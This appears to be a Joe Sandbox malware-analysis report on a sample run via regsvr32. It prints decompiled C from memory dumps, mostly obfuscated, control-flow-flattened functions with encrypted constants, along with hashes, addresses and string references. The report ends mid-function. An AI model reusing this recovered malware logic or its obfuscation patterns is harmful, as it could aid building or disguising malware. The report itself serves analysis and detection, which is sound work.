0x04b52dd7
0x04b52de2
0x04b52de5
0x04b52de9
0x04b52df1
0x04b52df9
0x04b52e01
0x04b52e09
0x04b52e11
0x04b52e19
0x04b52e21
0x04b52e2e
0x04b52e32
0x04b52e3c
0x04b52e40
0x04b52e48
0x04b52e50
0x04b52e58
0x04b52e63
0x04b52e64
0x04b52e68
0x04b52e70
0x04b52e78
0x04b52e80
0x04b52e88
0x04b52e90
0x04b52e9d
0x04b52ea1
0x04b52ea9
0x04b52eb1
0x04b52eb6
0x04b52ebe
0x04b52ec6
0x04b52ece
0x04b52ed3
0x04b52edb
0x04b52ee3
0x04b52ef0
0x04b52ef4
0x04b52efc
0x04b52f04
0x04b52f0c
0x04b52f16
0x04b52f26
0x04b52f2c
0x04b52f39
0x04b52f41
0x04b52f49
0x04b52f4e
0x04b52f56
0x04b52f5e
0x04b52f66
0x04b52f6e
0x04b52f76
0x04b52f7b
0x04b52f83
0x04b52f8b
0x04b52f93
0x04b52f98
0x04b52fa0
0x04b52fa8
0x04b52fb0
0x04b52fbd
0x04b52fbe
0x04b52fc2
0x04b52fca
0x04b52fd2
0x04b52fda
0x04b52fe2
0x04b52fef
0x04b52ff3
0x04b52ffb
0x04b53003
0x04b53008
0x04b5300d
0x04b53015
0x04b53023
0x04b53027
0x04b5302c
0x04b53034
0x04b5303c
0x04b53044
0x04b53049
0x04b53051
0x04b53059
0x04b53061
0x04b53069
0x04b53073
0x04b53077
0x04b5307f
0x04b5307f
0x04b5307f
0x04b53084
0x00000000
0x04b53084
0x04b53096
0x04b53155
0x04b53159
0x04b5315d
0x04b53162
0x04b53165
0x04b53168
0x04b5316c
0x04b53171
0x00000000
0x04b53171
0x04b530a2
0x04b530e4
0x04b530f6
0x04b530fb
0x04b530fe
0x04b53101
0x04b53103
0x04b5311d
0x04b5312d
0x04b53134
0x04b53138
0x04b5313d
0x04b53140
0x00000000
0x04b53140
0x04b530a4
0x04b530a6
0x00000000
0x04b531a1
0x04b530ae
0x00000000
0x04b530b4
0x04b530cd
0x04b530d2
0x04b530d5
0x04b530da
0x04b530e0
0x04b5307f
0x04b5307f
0x04b5307f
0x00000000
0x04b5307f
0x04b5307f
0x04b530da
0x04b530ae
0x04b531a9
0x04b531a9
0x04b53179
0x04b5317e
0x04b5317e
0x04b5317e
0x00000000
0x04b53084

Strings

sH, xrefs: 04B52F41
zbv, xrefs: 04B52E19
+;, xrefs: 04B52F83
$P, xrefs: 04B52DC3, 04B530B9

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$sH$zbv$+;
API String ID: 0-3806253346
Opcode ID: 49396ea671d9939504ce5dd442973ce158614b9bda1901ecb479b75dc0bae9cf
Instruction ID: c26870f5b5ab6e744ca25bc7bed046829ebcd3f872bb40b2ef400f39f689292e
Opcode Fuzzy Hash: 49396ea671d9939504ce5dd442973ce158614b9bda1901ecb479b75dc0bae9cf
Instruction Fuzzy Hash: 9DB10F72508381AFD398CF65C48A51BFBE1FBC4348F509A1DF99686260E3B1D959CF82

Uniqueness

Uniqueness Score: -1.00%

Function 04B4E4E5, Relevance: 5.2, Strings: 4, Instructions: 220
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E04B4E4E5(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v60;
				intOrPtr _v80;
				intOrPtr _v92;
				intOrPtr _v124;
				intOrPtr _v140;
				char _v152;
				char _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				unsigned int _v200;
				void* __ecx;
				void* _t118;
				signed int _t141;
				void* _t151;
				intOrPtr _t166;
				intOrPtr _t182;
				signed int _t183;
				intOrPtr _t184;
				signed int* _t187;
				void* _t189;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E04B4FE29(_t118);
				_v196 = 0x42a34f;
				_t187 =  &(( &_v200)[5]);
				_v196 = _v196 + 0xffffd591;
				_v196 = _v196 >> 8;
				_t182 = 0;
				_v196 = _v196 >> 0xd;
				_t151 = 0x8265549;
				_v196 = _v196 ^ 0x000e54fd;
				_v192 = 0xf4ad66;
				_t183 = 0x28;
				_v192 = _v192 * 0x74;
				_v192 = _v192 + 0xffff9a5e;
				_v192 = _v192 * 0x25;
				_v192 = _v192 ^ 0x06100388;
				_v164 = 0xada112;
				_v164 = _v164 << 6;
				_v164 = _v164 ^ 0x2b616de0;
				_v188 = 0x6e3b94;
				_v188 = _v188 * 0x6f;
				_v188 = _v188 ^ 0xb2fa2ce6;
				_v188 = _v188 >> 2;
				_v188 = _v188 ^ 0x27407061;
				_v184 = 0x76ba26;
				_v184 = _v184 ^ 0xa3b8c1ec;
				_v184 = _v184 * 6;
				_v184 = _v184 ^ 0xd6d91427;
				_v172 = 0x136254;
				_v172 = _v172 + 0x2ded;
				_v172 = _v172 ^ 0x001b6319;
				_v200 = 0xa09af9;
				_v200 = _v200 + 0x31d;
				_v200 = _v200 + 0xffff390b;
				_v200 = _v200 >> 0xc;
				_v200 = _v200 ^ 0x000c9fcd;
				_v176 = 0xee2a82;
				_v176 = _v176 / _t183;
				_v176 = _v176 ^ 0x000a5024;
				_t66 =  &_v176; // 0xa5024
				_t184 =  *_t66;
				_v180 = 0xbc2dba;
				_v180 = _v180 << 0xa;
				_v180 = _v180 << 0xc;
				_v180 = _v180 ^ 0x6e88cd95;
				_v168 = 0x8f86b;
				_v168 = _v168 * 0x73;
				_v168 = _v168 ^ 0x040961a3;
				while(1) {
					_t189 = _t151 - 0x90fe06e;
					if(_t189 > 0) {
						goto L23;
					}
					L2:
					if(_t189 == 0) {
						__eflags = _v140 - 3;
						if(__eflags == 0) {
							E04B500EF( &_v152);
							L16:
							_t151 = 0x574a4dd;
							continue;
							do {
								while(1) {
									_t189 = _t151 - 0x90fe06e;
									if(_t189 > 0) {
										goto L23;
									}
									goto L2;
								}
								L45:
								__eflags = _t151 - 0x4105f99;
							} while (__eflags != 0);
							L46:
							return _t182;
						}
						_t151 = 0xaf84b7f;
						while(1) {
							_t189 = _t151 - 0x90fe06e;
							if(_t189 > 0) {
								goto L23;
							}
							goto L2;
						}
						goto L23;
					}
					if(_t151 == 0x172cdb8) {
						_push(_t151);
						_push(_t151);
						_t184 = E04B3C5D8(0x5c);
						_t187 =  &(_t187[3]);
						__eflags = _t184;
						if(__eflags == 0) {
							L14:
							_t151 = 0x666f2cd;
							continue;
						}
						 *((intOrPtr*)(_t184 + 0x30)) = _v80;
						 *((intOrPtr*)(_t184 + 8)) = _v124;
						 *((intOrPtr*)(_t184 + 4)) = _v92;
						_t151 = 0xc6d3ff5;
						continue;
					}
					if(_t151 == 0x2270dbc) {
						__eflags = _v140 - 7;
						if(__eflags == 0) {
							E04B47D5B( &_v152);
						}
						goto L16;
					}
					if(_t151 == 0x39f0156) {
						__eflags = E04B49D3E( &_v60, _v164, __eflags, _v188,  &_v160);
						if(__eflags == 0) {
							goto L46;
						}
						goto L14;
					}
					if(_t151 == 0x574a4dd) {
						_t166 =  *0x4b56210; // 0x0
						_t182 = _t182 + 1;
						__eflags = _t182;
						 *((intOrPtr*)(_t184 + 0x24)) =  *((intOrPtr*)(_t166 + 0x210));
						 *((intOrPtr*)(_t166 + 0x210)) = _t184;
						L12:
						_t151 = 0x39f0156;
						continue;
					}
					if(_t151 == 0x666f2cd) {
						_t141 = E04B48806(_v184, _v172,  &_v160,  &_v152);
						asm("sbb ecx, ecx");
						_t151 = ( ~_t141 & 0xfdd3cc62) + 0x39f0156;
						continue;
					}
					if(_t151 != 0x8265549) {
						goto L45;
					}
					L04B322A6(_a4, _v196,  &_v60, _v192);
					_t187 =  &(_t187[2]);
					_t151 = 0xf4b2976;
					continue;
					L23:
					__eflags = _t151 - 0x9a4295f;
					if(_t151 == 0x9a4295f) {
						__eflags = _v140 - 5;
						if(__eflags == 0) {
							E04B52D53( &_v152, _t184);
							_t151 = 0x574a4dd;
							goto L45;
						}
						_t151 = 0xa7bb9ce;
						continue;
					}
					__eflags = _t151 - 0xa7bb9ce;
					if(_t151 == 0xa7bb9ce) {
						__eflags = _v140 - 6;
						if(__eflags == 0) {
							E04B4A474( &_v152);
							goto L16;
						}
						_t151 = 0x2270dbc;
						continue;
					}
					__eflags = _t151 - 0xaf84b7f;
					if(_t151 == 0xaf84b7f) {
						__eflags = _v140 - 4;
						if(__eflags == 0) {
							L04B3238C( &_v152);
							goto L16;
						}
						_t151 = 0x9a4295f;
						continue;
					}
					__eflags = _t151 - 0xbf40480;
					if(_t151 == 0xbf40480) {
						__eflags = _v140 - 2;
						if(__eflags == 0) {
							E04B4CCD9( &_v152, _t184);
							goto L16;
						}
						_t151 = 0x90fe06e;
						continue;
					}
					__eflags = _t151 - 0xc6d3ff5;
					if(_t151 == 0xc6d3ff5) {
						__eflags = _v140 - 1;
						if(__eflags == 0) {
							E04B3A871( &_v152);
							goto L16;
						}
						_t151 = 0xbf40480;
						continue;
					}
					__eflags = _t151 - 0xf4b2976;
					if(_t151 != 0xf4b2976) {
						goto L45;
					}
					E04B3B820(0);
					goto L12;
				}
			}

0x04b4e4ef
0x04b4e4f6
0x04b4e4fd
0x04b4e504
0x04b4e506
0x04b4e50b
0x04b4e513
0x04b4e516
0x04b4e520
0x04b4e525
0x04b4e527
0x04b4e52c
0x04b4e531
0x04b4e53e
0x04b4e552
0x04b4e553
0x04b4e557
0x04b4e564
0x04b4e568
0x04b4e570
0x04b4e578
0x04b4e57d
0x04b4e585
0x04b4e592
0x04b4e596
0x04b4e59e
0x04b4e5a3
0x04b4e5ab
0x04b4e5b3
0x04b4e5c0
0x04b4e5c4
0x04b4e5cc
0x04b4e5d4
0x04b4e5dc
0x04b4e5e4
0x04b4e5ec
0x04b4e5f4
0x04b4e5fc
0x04b4e601
0x04b4e609
0x04b4e617
0x04b4e61b
0x04b4e623
0x04b4e623
0x04b4e627
0x04b4e62f
0x04b4e634
0x04b4e639
0x04b4e641
0x04b4e64e
0x04b4e652
0x04b4e65a
0x04b4e65a
0x04b4e660
0x00000000
0x00000000
0x04b4e666
0x04b4e666
0x04b4e79d
0x04b4e7a2
0x04b4e7b2
0x04b4e747
0x04b4e747
0x04b4e749
0x04b4e65a
0x04b4e65a
0x04b4e65a
0x04b4e660
0x00000000
0x00000000
0x00000000
0x04b4e660
0x04b4e89d
0x04b4e89d
0x04b4e89d
0x04b4e8a9
0x04b4e8b5
0x04b4e8b5
0x04b4e7a4
0x04b4e65a
0x04b4e65a
0x04b4e660
0x00000000
0x00000000
0x00000000
0x04b4e660
0x00000000
0x04b4e65a
0x04b4e672
0x04b4e769
0x04b4e76a
0x04b4e772
0x04b4e774
0x04b4e777
0x04b4e779
0x04b4e736
0x04b4e736
0x00000000
0x04b4e736
0x04b4e782
0x04b4e789
0x04b4e790
0x04b4e793
0x00000000
0x04b4e793
0x04b4e67e
0x04b4e740
0x04b4e745
0x04b4e752
0x04b4e752
0x00000000
0x04b4e745
0x04b4e686
0x04b4e72e
0x04b4e730
0x00000000
0x00000000
0x00000000
0x04b4e730
0x04b4e68e
0x04b4e6f6
0x04b4e6fc
0x04b4e6fc
0x04b4e703
0x04b4e706
0x04b4e70c
0x04b4e70c
0x00000000
0x04b4e70c
0x04b4e696
0x04b4e6dc
0x04b4e6e7
0x04b4e6ef
0x00000000
0x04b4e6ef
0x04b4e69e
0x00000000
0x00000000
0x04b4e6bb
0x04b4e6c0
0x04b4e6c3
0x00000000
0x04b4e7b9
0x04b4e7b9
0x04b4e7bf
0x04b4e87f
0x04b4e884
0x04b4e896
0x04b4e89b
0x00000000
0x04b4e89b
0x04b4e886
0x00000000
0x04b4e886
0x04b4e7c5
0x04b4e7cb
0x04b4e860
0x04b4e865
0x04b4e875
0x00000000
0x04b4e875
0x04b4e867
0x00000000
0x04b4e867
0x04b4e7d1
0x04b4e7d7
0x04b4e841
0x04b4e846
0x04b4e856
0x00000000
0x04b4e856
0x04b4e848
0x00000000
0x04b4e848
0x04b4e7d9
0x04b4e7df
0x04b4e820
0x04b4e825
0x04b4e837
0x00000000
0x04b4e837
0x04b4e827
0x00000000
0x04b4e827
0x04b4e7e1
0x04b4e7e7
0x04b4e801
0x04b4e806
0x04b4e816
0x00000000
0x04b4e816
0x04b4e808
0x00000000
0x04b4e808
0x04b4e7e9
0x04b4e7ef
0x00000000
0x00000000
0x04b4e7f7
0x00000000
0x04b4e7f7

Strings

-, xrefs: 04B4E5D4
ap@', xrefs: 04B4E5A3
$P, xrefs: 04B4E623
ma+, xrefs: 04B4E57D

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$ap@'$-$ma+
API String ID: 0-1845766705
Opcode ID: e4e19e046ccb8518932af17445ed3d989b72d63c4924bdc2cd1dd85fac63876b
Instruction ID: 760e74160430e21eb493d83c400975564e1bf5a77ee4b9132d8bfd51f1ff5284
Opcode Fuzzy Hash: e4e19e046ccb8518932af17445ed3d989b72d63c4924bdc2cd1dd85fac63876b
Instruction Fuzzy Hash: E1917B712083418FC768CF25D89892FBBE5FBD4318F044AAEE59656260D770EA49EF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B43EAA, Relevance: 5.2, Strings: 4, Instructions: 152
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E04B43EAA() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _t134;
				void* _t136;
				signed int _t139;
				signed int _t140;
				void* _t141;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				void* _t162;
				signed int _t163;
				signed int* _t164;

				_t164 =  &_v572;
				_v540 = 0x8ebbe1;
				_v540 = _v540 ^ 0xad58d7a7;
				_t141 = 0x14ab4b7;
				_v540 = _v540 + 0xffffedc9;
				_v540 = _v540 ^ 0xadd357de;
				_v568 = 0x9c9bda;
				_v568 = _v568 | 0x36ff3ceb;
				_v568 = _v568 << 9;
				_v568 = _v568 << 0xc;
				_v568 = _v568 ^ 0xff6ebe8a;
				_v572 = 0xc63a18;
				_t158 = 0x35;
				_v572 = _v572 / _t158;
				_v572 = _v572 + 0x3c6e;
				_t162 = 0;
				_t159 = 9;
				_v572 = _v572 * 0x2b;
				_v572 = _v572 ^ 0x00acfd7d;
				_v564 = 0xeb3370;
				_v564 = _v564 + 0xdf6d;
				_v564 = _v564 + 0xffff5689;
				_v564 = _v564 + 0xffff8af1;
				_v564 = _v564 ^ 0x00e2fb3e;
				_v556 = 0xcf22db;
				_v556 = _v556 + 0xdc1c;
				_v556 = _v556 ^ 0xabcda180;
				_v556 = _v556 * 0x79;
				_v556 = _v556 ^ 0xd41378ff;
				_v536 = 0x8b65e6;
				_v536 = _v536 >> 4;
				_v536 = _v536 | 0x892333f7;
				_v536 = _v536 ^ 0x8920b82e;
				_v552 = 0x92756e;
				_v552 = _v552 >> 9;
				_v552 = _v552 ^ 0x00055fbe;
				_v548 = 0xae9165;
				_v548 = _v548 >> 8;
				_v548 = _v548 << 3;
				_v548 = _v548 ^ 0x000d4470;
				_v560 = 0x7e7234;
				_t163 = _v552;
				_t140 = _v552;
				_v560 = _v560 * 0x4b;
				_v560 = _v560 * 0x7e;
				_v560 = _v560 / _t159;
				_v560 = _v560 ^ 0x06ab9265;
				_v524 = 0x1cfeb9;
				_v524 = _v524 + 0xfb24;
				_v524 = _v524 ^ 0x001447a0;
				_v532 = 0x9f8444;
				_t160 = 0x41;
				_t161 = _v552;
				_v532 = _v532 / _t160;
				_v532 = _v532 ^ 0x00060648;
				_v528 = 0xb53968;
				_v528 = _v528 >> 6;
				_v528 = _v528 ^ 0x00025f1c;
				while(_t141 != 0x6ff509) {
					if(_t141 == 0x14ab4b7) {
						_t141 = 0x9db1fde;
						continue;
					} else {
						if(_t141 == 0x18d2c7e) {
							_t140 = E04B409DD(_v536,  &_v520, _v552, _v548);
							_t141 = 0x3c9aed4;
							continue;
						} else {
							if(_t141 == 0x3c9aed4) {
								_t134 = E04B3EFE1(_v524, _v532, _v528, _t140);
								_t164 =  &(_t164[3]);
								_t163 = _t134;
								_t141 = 0x6ff509;
								continue;
							} else {
								if(_t141 == 0x65dbbcc) {
									_push(_t141);
									_t136 = L04B40ABA(_v568, _v572, __eflags, _v564,  &_v520, _t161, _v556);
									_t164 =  &(_t164[5]);
									__eflags = _t136;
									if(__eflags != 0) {
										_t141 = 0x18d2c7e;
										continue;
									}
								} else {
									if(_t141 != 0x9db1fde) {
										L15:
										__eflags = _t141 - 0xdb9fdb2;
										if(__eflags != 0) {
											continue;
										}
									} else {
										_t139 = E04B3DD35();
										_t161 = _t139;
										if(_t139 != 0) {
											_t141 = 0x65dbbcc;
											continue;
										}
									}
								}
							}
						}
					}
					return _t162;
				}
				_v544 = 0xee725a;
				_v544 = _v544 ^ 0x4fb40d60;
				_v544 = _v544 | 0x3a9e06c5;
				_v544 = _v544 ^ 0x55f97f1d;
				__eflags = _t163 - _v544;
				_t162 =  ==  ? 1 : _t162;
				__eflags = _t162;
				_t141 = 0xdb9fdb2;
				goto L15;
			}

0x04b43eaa
0x04b43eb0
0x04b43eba
0x04b43ec2
0x04b43ec7
0x04b43ecf
0x04b43ed7
0x04b43edf
0x04b43ee7
0x04b43eec
0x04b43ef1
0x04b43ef9
0x04b43f09
0x04b43f0e
0x04b43f14
0x04b43f1c
0x04b43f23
0x04b43f26
0x04b43f2a
0x04b43f32
0x04b43f3a
0x04b43f42
0x04b43f4a
0x04b43f52
0x04b43f5a
0x04b43f62
0x04b43f6a
0x04b43f77
0x04b43f7b
0x04b43f83
0x04b43f8b
0x04b43f90
0x04b43f98
0x04b43fa0
0x04b43fa8
0x04b43fad
0x04b43fb5
0x04b43fbd
0x04b43fc2
0x04b43fc7
0x04b43fcf
0x04b43fdc
0x04b43fe0
0x04b43fe4
0x04b43fed
0x04b43ff9
0x04b43ffd
0x04b44005
0x04b4400d
0x04b44015
0x04b4401d
0x04b44029
0x04b4402c
0x04b44030
0x04b44034
0x04b4403c
0x04b44044
0x04b44049
0x04b44051
0x04b44063
0x04b44124
0x00000000
0x04b44069
0x04b4406f
0x04b44118
0x04b4411a
0x00000000
0x04b44075
0x04b4407b
0x04b440ed
0x04b440f2
0x04b440f5
0x04b440f7
0x00000000
0x04b4407d
0x04b44083
0x04b440ab
0x04b440c2
0x04b440c7
0x04b440ca
0x04b440cc
0x04b440d2
0x00000000
0x04b440d2
0x04b44085
0x04b4408b
0x04b4415f
0x04b4415f
0x04b44165
0x00000000
0x00000000
0x04b44091
0x04b44095
0x04b4409a
0x04b4409e
0x04b440a4
0x00000000
0x04b440a4
0x04b4409e
0x04b4408b
0x04b44083
0x04b4407b
0x04b4406f
0x04b44177
0x04b44177
0x04b4412e
0x04b44138
0x04b44141
0x04b44149
0x04b44155
0x04b44157
0x04b44157
0x04b4415a
0x00000000

Strings

n<, xrefs: 04B43F14
4r~, xrefs: 04B43FCF
Zr, xrefs: 04B4412E
p3, xrefs: 04B43F32

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 4r~$Zr$n<$p3
API String ID: 0-1989199487
Opcode ID: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
Instruction ID: 92012284fc97580f816c476747f93d79672a0a722fb451e198dc182186bf0b48
Opcode Fuzzy Hash: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
Instruction Fuzzy Hash: 716155715083009FC358CE26C48952FBBE1FBD8758F104A6DF29AA6260D3B4DA59DF47

Uniqueness

Uniqueness Score: -1.00%

Function 04B32194, Relevance: 5.1, Strings: 4, Instructions: 83
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E04B32194(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t67;
				intOrPtr* _t77;
				signed int _t80;
				signed int _t81;
				void* _t88;

				_t88 = __ecx;
				E04B4FE29(_t67);
				_v28 = 0x23b662;
				_v24 = 0;
				_v12 = 0x5a4623;
				_v12 = _v12 + 0x2367;
				_v12 = _v12 ^ 0x11a2f25e;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x3f16c1ec;
				_v20 = 0x4a1b7a;
				_v20 = _v20 ^ 0x2a8c83f5;
				_v20 = _v20 ^ 0x0b06bd0c;
				_v20 = _v20 ^ 0x21c6558f;
				_v8 = 0x75635a;
				_v8 = _v8 >> 0xc;
				_t80 = 0x19;
				_v8 = _v8 / _t80;
				_v8 = _v8 ^ 0x5f69645e;
				_v8 = _v8 ^ 0x5f68d09e;
				_v16 = 0xc2b090;
				_v16 = _v16 + 0xffff85c8;
				_t81 = 0x7c;
				_v16 = _v16 / _t81;
				_v16 = _v16 ^ 0x000d5e79;
				_t77 = L04B3EB52(_t81, _t81, 0x525cea78, 0xe3, 0x4be980c1);
				return  *_t77(_a56, _a36, _a48, 0, 0, _a16, _a60, _t88, _a44, _a52, __ecx, __edx, 0, _a8, _a12, _a16, _a20, _a24, 0, _a32, _a36, _a40, _a44, _a48, _a52, _a56, _a60);
			}

0x04b321a1
0x04b321cb
0x04b321d0
0x04b321da
0x04b321df
0x04b321e6
0x04b321ed
0x04b321f4
0x04b321f8
0x04b321ff
0x04b32206
0x04b3220d
0x04b32214
0x04b3221b
0x04b32222
0x04b3222b
0x04b32230
0x04b32235
0x04b3223c
0x04b32243
0x04b3224a
0x04b32254
0x04b3225c
0x04b3225f
0x04b3227e
0x04b322a5

Strings

^di_, xrefs: 04B32235
#FZ, xrefs: 04B321DF
y^, xrefs: 04B3225F
g#, xrefs: 04B321E6

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #FZ$^di_$g#$y^
API String ID: 0-3614166594
Opcode ID: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
Instruction ID: ad8cc8c8d7e90413e399643e5c93898e595013f1aa16ee9b0080918bae3f6cd3
Opcode Fuzzy Hash: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
Instruction Fuzzy Hash: 4531F572800208FBDF05DFA5DC098DEBF76FF89304F508199FA1066120D3B69A60AF90

Uniqueness

Uniqueness Score: -1.00%

Function 10027704, Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E10027704() {
				signed int _v8;
				char _v16;
				void* __esi;
				signed int _t8;
				intOrPtr* _t15;
				intOrPtr _t16;
				char _t20;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t24;
				int _t25;
				signed int _t27;

				_t8 =  *0x10057a08; // 0x7d1a16f8
				_v8 = _t8 ^ _t27;
				_t24 = 0;
				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
					L4:
					_t25 = GetACP();
				} else {
					_t20 = _v16;
					_t15 =  &_v16;
					if(_t20 == 0) {
						goto L4;
					} else {
						do {
							_t15 = _t15 + 1;
							_t24 = _t24 * 0xa + _t20 - 0x30;
							_t20 =  *_t15;
						} while (_t20 != 0);
						if(_t24 == 0) {
							goto L4;
						}
					}
				}
				return E100167D5(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
			}

0x1002770a
0x10027711
0x10027715
0x10027731
0x10027752
0x10027758
0x10027733
0x10027733
0x10027738
0x1002773b
0x00000000
0x1002773d
0x1002773d
0x10027743
0x10027744
0x10027748
0x1002774a
0x10027750
0x00000000
0x00000000
0x10027750
0x1002773b
0x10027768

APIs

GetThreadLocale.KERNEL32 ref: 10027717
GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10027729
GetACP.KERNEL32 ref: 10027752

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Locale$InfoThread
String ID:
API String ID: 4232894706-0
Opcode ID: 2cdb2551da010e6fdb5870f0ade684243d2ea15601f9ad5558c20012d78a2078
Instruction ID: 66289914fabe9bf2d1b1abcf1e27b8b8f35a8bed3fb6bd80cc0c1702fed1c004
Opcode Fuzzy Hash: 2cdb2551da010e6fdb5870f0ade684243d2ea15601f9ad5558c20012d78a2078
Instruction Fuzzy Hash: DCF0C231E042785BE701DB7598556EF77E4FF04B90B9101ADEC86E7280D720AE0987C4

Uniqueness

Uniqueness Score: -1.00%

Function 1000D804, Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000D804(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E1000D6C3() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E1000D7B8( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x1005a754(_a4, _a8);
			}

0x1000d811
0x1000d825
0x1000d839
0x1000d851
0x1000d83b
0x1000d842
0x1000d842
0x1000d859
0x00000000
0x1000d85b
0x00000000
0x1000d862
0x1000d859
0x00000000
0x1000d827
0x00000000

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e9ea1c9e954d40bf421bd01099b490e8a12a05a626fb39da3dad4e443b19b0f
Instruction ID: 387a2a710324106c5c2e9ba8f0dac284bfb83953cc403e56f04fca2c0ded1ab9
Opcode Fuzzy Hash: 0e9ea1c9e954d40bf421bd01099b490e8a12a05a626fb39da3dad4e443b19b0f
Instruction Fuzzy Hash: 71F0C935504209AAFF01EF61CC489AE7BA9EF043D4B10C026FC19D5068DB35DA559BA1

Uniqueness

Uniqueness Score: -1.00%

Function 04B48FAE, Relevance: 4.1, Strings: 3, Instructions: 312
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E04B48FAE(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
